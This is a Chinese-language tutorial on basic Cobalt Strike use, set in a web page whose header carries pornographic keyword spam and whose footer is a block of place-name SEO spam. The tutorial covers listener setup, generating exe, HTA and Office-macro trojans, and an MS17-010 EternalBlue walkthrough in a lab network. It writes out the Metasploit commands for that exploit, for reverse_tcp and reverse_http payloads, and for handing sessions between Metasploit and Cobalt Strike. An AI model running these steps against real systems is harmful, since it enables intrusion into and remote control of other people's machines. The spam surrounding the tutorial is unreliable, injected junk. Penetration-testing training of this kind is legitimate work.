97色精品视频在线观看免费,日韩欧美亚洲每日更新网,国产精品色婷婷99久久精品,99e热久久免费精品首页

?Cobalt Strike基礎使用

2025-08-04 09:16:16 RAIZ

文章作者:華盟安全團隊-- Gaowu

Cobalt Strike分為客戶端組件和服務器組件,服務器的組件也是團隊服務器,可以放在局域網或者公網下進行團隊使用,也是Cobalt Strike社會工程功能的托管機器,團隊服務器還可以存儲由Cobalt Strike收集的數據,并且進行日志管理。


Cobalt Strike服務器必須在Linux系統上運行,這里演示服務器在Linux KALI端,本地進行Cobalt Strike客戶端的連接。


睿智創新RAIZ,一體化IT服務提供商


CobaltStrike集成了端口轉發、服務掃描,自動化溢出,多模式端口監聽,windows exe 木馬生成,windows dll 木馬生成,java 木馬生成,office 宏病毒生成,木馬捆綁。釣魚攻擊包。


CS使用

啟動CS服務端


睿智創新RAIZ,一體化IT服務提供商
睿智創新RAIZ,一體化IT服務提供商


啟動客戶端

服務端啟動后客戶端啟動進行連接(團隊多人連接將用戶名設置為自己的用來區分團隊成員)


睿智創新RAIZ,一體化IT服務提供商


主界面


睿智創新RAIZ,一體化IT服務提供商


CS功能使用(主機上線)


1.設置監聽器用來接收會話


睿智創新RAIZ,一體化IT服務提供商


name:監聽器名字

payload:payload類型

Host: shell反彈的主機,kali IP

Port: 反彈端口


睿智創新RAIZ,一體化IT服務提供商


這里Payload有9種選項,如下:


內部的Listener

windows/beacon_dns/reverse_dns_txt

windows/beacon_dns/reverse_http

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https 

windows/beacon_smb/bind_pipe


外部的Listener

windows/foreign/reverse_dns_txt

windows/foreign/reverse_http

windows/foreign/reverse_https

windows/foreign/reverse_tcp


Beacon為內置的監聽器,在目標主機執行相應的payload,獲取shell到cs上;其中包含DNS、HTTP、HTTPS等,Beacon可以選擇通過DNS還是HTTP/S協議出口網絡,甚至可以在使用Beacon通訊過程中切換HTTP和DNS。其支持多主機連接,部署好Beacon后提交一個要連回的域名或主機的列表,Beacon將通過這些主機輪詢。目標網絡的防護團隊必須攔截所有的列表中的主機才可中斷和其網絡的通訊。通過種種方式獲取shell以后(比如直接運行生成的exe),就可以使用Beacon了。


Foreign為外部結合的Listener,經常用于MSF的結合,例如獲取meterpreter到MSF上。



2.生成木馬


HTML Application 生成惡意的HTA木馬文件;
MS Office Macro 生成office宏病毒文件;
Payload Generator 生成各種語言版本的payload;
Windows Executable 生成可執行exe木馬;
Windows Executable(S) 生成無狀態的可執行exe木馬


睿智創新RAIZ,一體化IT服務提供商


睿智創新RAIZ,一體化IT服務提供商


生成后會保存到指定地方,通過某種方式上傳到對方機器上,可以通過Webshell方式等這里不在講解了


受害者運行exe文件我們的CS就直接上線了


睿智創新RAIZ,一體化IT服務提供商


這是生成exe文件,還可以生成宏病毒等上面介紹到的。


3.正常我們進去需要調整響應的時間,sleep 3 就行。


睿智創新RAIZ,一體化IT服務提供商


睿智創新RAIZ,一體化IT服務提供商


可以對我們上線的機器進行以下操作,也可以聯動MSF進行使用


睿智創新RAIZ,一體化IT服務提供商


聯動MSF使用

將MSF的會話轉發到CS上

通過漏洞復現演示MSF獲取目標Session

KALI:192.168.50.218

CS:192.168.50.130

受害者IP:192.168.50.185


1.發現漏洞

Nmap -A掃描目標開放了445端口


睿智創新RAIZ,一體化IT服務提供商


通過使用MSF輔助模塊掃描發現存在ms17_010漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.50.185

exploit


睿智創新RAIZ,一體化IT服務提供商


查找漏洞利用模塊


睿智創新RAIZ,一體化IT服務提供商


漏洞利用

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set RHOST 192.168.50.185

Run


睿智創新RAIZ,一體化IT服務提供商


獲取后 我們background獲取session


睿智創新RAIZ,一體化IT服務提供商


與CS聯動,將會話轉發到CS中


CS配置新建一個監聽


睿智創新RAIZ,一體化IT服務提供商


KALI中配置

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true

set lhost 192.168.50.218  //KALI IP

set lport 4443 與CS同端口

set session 1


睿智創新RAIZ,一體化IT服務提供商


CS這邊就接收到了MSF的會話


睿智創新RAIZ,一體化IT服務提供商


CS的會話轉發到MSF中


由于生成的木馬就是HTTP的,所以委派給msf時,監聽器還是HTTP的

CS添加一個監聽器


睿智創新RAIZ,一體化IT服務提供商


MSF準備


Use exploit/multi/handler

Set payload windows/meterpreter/reverse_http

Set lhost ip

Set lport ip


睿智創新RAIZ,一體化IT服務提供商


設置完成后我們就可以使用CS進行委派會話了


睿智創新RAIZ,一體化IT服務提供商


選中我們剛剛創建的就行


睿智創新RAIZ,一體化IT服務提供商


這樣我們的MSF端就會獲取到這個會話



我要咨詢
主站蜘蛛池模板: 天门市| 东丰县| 怀安县| 聊城市| 武山县| 潞城市| 哈尔滨市| 海城市| 晋中市| 沙湾县| 巴塘县| 驻马店市| 靖江市| 临洮县| 凤庆县| 永川市| 郓城县| 清苑县| 错那县| 宁国市| 察雅县| 徐闻县| 安达市| 祁连县| 青州市| 伊宁市| 洛阳市| 瑞丽市| 铁岭市| 菏泽市| 库车县| 灌南县| 古蔺县| 阿克| 海丰县| 渭源县| 定襄县| 福清市| 云阳县| 文化| 河西区|